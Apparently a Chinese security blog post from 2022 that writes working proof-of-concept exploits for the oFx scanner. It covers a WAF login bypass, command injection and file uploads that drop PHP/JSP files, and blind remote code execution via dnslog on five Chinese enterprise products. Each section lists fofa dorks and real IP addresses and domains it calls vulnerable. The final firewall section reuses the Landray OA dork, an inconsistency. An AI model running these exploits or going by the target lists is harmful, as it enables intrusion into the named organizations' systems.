2022HW

2022-09-18   

安恒信息-明御WAF登陆绕过

根据情报,POC地址:https://github.com/midisec/pocsuite-poc/blob/main/pocs/mingyu_login_bypass.py

尝试写oFx POC:

vuln = [False,""]
url = self.target + "/report.m?a=rpc-timed" # url自己按需调整

headers = {
            "Cookie": "WAFFSSID=123456",
            "User-Agent":get_random_ua(),
            "Connection":"close",
            }

try:
    """
    检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
    """
    req0 = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
    req1 = requests.get(self.target,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
    if req0.status_code == 200 and "系统管理员" in req1.text:
        vuln = [True,req1.text]
    else:
        vuln = [False,req1.text]
except Exception as e:
    raise e

fofa dork是:app="安恒信息-明御WAF",全网资产数量165个

扫描结果,命中规则5个资产:

https://61.161.193.5
https://58.244.62.126:1443
https://61.184.79.99:14443
https://222.243.158.38:10443
https://202.107.190.91:50001

手动验证:
假设目标url为http://target/

第一步,访问http://target/report.m?a=rpc-timed,不用管返回结果

第二步访问http://target/,如果界面长这样:
show
就说明成功绕过登陆了

结论:漏洞真实,POC有效,已收录至oFx

天融信-上网行为管理系统 static_convert.php 命令注入漏洞

情报地址:balabala…

尝试写POC:

vuln = [False,""]
con_flag = random_str(10)
content = hashlib.md5(con_flag.encode()).hexdigest()
url = self.target + "/view/IPV6/naborTable/static_convert.php?blocks[0]=|echo '<?php echo md5({num});unlink(__FILE__);?>' >>/var/www/html/{name}.php".format(num=con_flag,name = con_flag) # url自己按需调整

headers = {
            "User-Agent":get_random_ua(),
            "Connection":"close",
            }

try:
    """
    检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
    """
    req0 = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
    req1 = requests.get(self.target + "/" + con_flag + ".php",headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
    if req0.status_code == 200 and content in req1.text:
        vuln = [True,"<title>" + self.target + "/" + con_flag + ".php" + "</title> \n" + req1.text]
    else:
        vuln = [False,req0.text]
except Exception as e:
    raise e

fofa dork是:app="天融信-上网行为管理系统",全网资产328台

扫描结果,命中规则30➕条,依旧例,展示五条:

https://221.226.88.186:4433
https://220.165.246.249:8443
https://222.82.218.174:8443
https://111.43.98.222
https://218.66.6.85:8090

手动验证:
假设目标url为http://target/

第一步,访问http://target/view/IPV6/naborTable/static_convert.php?blocks[0]=|echo '<?php echo 123;?>' >>/var/www/html/test12344321.php(ps:写文件内容和保存路径都是我随便编的,ofx的poc在这部分内容做了随机化处理)

第二步,访问http://target/test12344321.php,如果返回的内容是123,则说明漏洞存在复现成功

结论:漏洞真实,POC有效,已收录至oFx

用友 时空KSOA 前台文件上传漏洞

情报地址:balabala…

尝试写POC:

vuln = [False,""]
con_flag = random_str(10)

url = self.target + "/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename={name}.jsp".format(name=con_flag) # url自己按需调整


headers = {
            "User-Agent":get_random_ua(),
            "Connection":"close",
            }

data = """<% out.println("{content}"); %>""".format(content = con_flag)

try:
    """
    检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
    """
    req0 = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
    flag = re.search('(?<=<root>).*(?=</root>)',req0.text).group(0)
    req1 = requests.get(self.target + flag,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
    
    if con_flag in req1.text:
        vuln = [True,"<title>" + self.target + flag + "</title>\n" + req1.text]
    else:
        vuln = [False,req0.text]
except Exception as e:
    raise e

fofa dork是:app="用友-时空KSOA",全网资产3400➕台

扫描结果,命中规则1200➕条,依旧例,展示五条:

http://121.42.35.91:8899
http://10.hctmes.com:89
http://www.mba.hctmes.com:89
http://csr21.net.hctmes.com:89
http://219.130.112.85:2020

手动验证:
假设目标url为http://target/

第一步,发送请求:

POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=test1234554321.jsp HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 32

<% out.println("test1234554321"); %>

返回结果应该为:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: 0
Content-Type: text/xml;charset=GBK
Vary: Accept-Encoding
Date: Fri, 05 Aug 2022 18:46:38 GMT
Connection: close

<root>/pictures/test1234554321.jsp</root>

第二步,访问http://target/pictures/test1234554321.php,如果返回的内容是test1234554321,则说明漏洞存在复现成功

结论:漏洞真实,POC有效,已收录至oFx

蓝凌OA sysFormulaSimulateByJS 未授权命令执行漏洞

情报地址:balabala…

考虑到这漏洞的命令执行是无回显的,因此需要dnslog来实现漏洞检测,而oFx是支持ceye api的
尝试写POC:

vuln = [False,""]
success,dns_flag = get_ceye_dns()
if success == False:
    return [False,dns_flag]
url = self.target + "/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function test(){ return java.lang.Runtime};r=test();r.getRuntime().exec(\"ping -c 1 %s\")&type=1" % (dns_flag) # url自己按需调整        

headers = {
            "User-Agent":get_random_ua(),
            "Connection":"close",
            }

try:
    """
    检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
    """
    req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
    flager = verify_ceye_dns(dns_flag)

    if flager == True:
        vuln = [True,dns_flag]
    elif flager == False:
        vuln = [False,dns_flag]
    else:
        vuln = [False,flager]
except Exception as e:
    raise e

预计会返回:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Set-Cookie: JSESSIONID=5139D5D3C9403ACAAD4FF87BB546B9A7; Path=/; HttpOnly
Content-Disposition: inline;filename=f.txt
Content-Type: application/json;charset=UTF-8
Date: Sun, 07 Aug 2022 06:34:46 GMT
Connection: close
Content-Length: 89

{"success":true,"data":[{"message":"模拟通过","success":"1"}],"msg":null,"code":null}

当然了我们用的是dnslog,看不看回显意义不大。

fofa dork是:app="Landray-OA系统",全网资产10000➕台

扫描结果,命中规则800➕条(笔者网络、ceye、目标网络状况都有可能不稳定,一定有一批漏报的),依旧例,展示五条:

http://47.106.20.236
http://47.108.199.198:8080
http://dhcp.pilsnet.hctmes.com:8888
http://www.status.hctmes.com:8888
http://oa.lz12371.cn:8081

手动验证:
不必验证了(主要是我懒),oFx扫描以后会给出随机生成的子域名,拿着这个子域名去ceye找找看就好了

结论:漏洞真实,POC有效,已收录至oFx

绿盟下一代防火墙 resourse.php 任意文件上传漏洞

情报地址:balabala…

说是个文件上传,那就随便写点东西传上去就好了
尝试写POC:

vuln = [False,""]
con_flag = random_str(10)
content = hashlib.md5(con_flag.encode()).hexdigest()

host0 = self.protocol + self.host + ":8081"
host1 = self.protocol + self.host + ":4433"

url0 = host0 + "/api/v1/device/bugsInfo" # url自己按需调整
data0 = """--4803b59d015026999b45993b1245f0ef\nContent-Disposition: form-data; name="file"; filename="sess_test"\n\nlang|s:52:"../../../../../../../../../../../../../../../../tmp/";\n--4803b59d015026999b45993b1245f0ef--"""
data1 = """--4803b59d015026999b45993b1245f0ef\nContent-Disposition: form-data; name="file"; filename="compose.php"\n\n<?php echo md5({con_flag});?>\n--4803b59d015026999b45993b1245f0ef--""".format(con_flag=con_flag)

url1 = host1 + "/mail/include/header_main.php"

headers = {
            "User-Agent":get_random_ua(),
            'Cookie': 'PHPSESSID_NF=test',
            "Content-Type": 'multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef',
            "Connection":"close",
            }

try:
    """
    检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
    """
    req0 = requests.post(url0,data=data0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
    req1 = requests.post(url0,data=data1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
    req2 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
    if content in req2.text:
        vuln = [True,req2.text]
    else:
        vuln = [False,req2.text]
except Exception as e:
    raise e

fofa dork是:app="Landray-OA系统",全网资产10000➕台

扫描结果,命中规则1200➕条,依旧例,展示五条:

https://211.103.242.254
https://113.56.192.23:4430
https://111.196.27.195:4430
https://183.6.52.98
https://222.168.9.82

手动验证:
balabala

结论:漏洞真实,POC有效,已收录至oFx

Q.E.D.